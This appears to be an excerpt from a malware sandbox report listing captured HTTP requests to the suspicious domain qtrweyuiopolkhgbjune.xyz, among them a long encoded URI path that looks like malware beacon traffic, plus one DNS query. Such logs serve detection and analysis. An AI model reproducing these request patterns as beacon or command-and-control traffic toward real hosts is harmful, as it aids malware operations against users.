            Source: global trafficHTTP traffic detected: GET /uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /public/css/normalize.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/bootstrap.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/themify-icons.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/lib/vector-map/jqvmap.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/cs-skin-elastic.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/scss/style.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/font-awesome.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/flag-icon.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/vendor/jquery-2.1.4.min.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/plugins.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
Source: unknown | DNS traffic detected: queries for: www.msn.com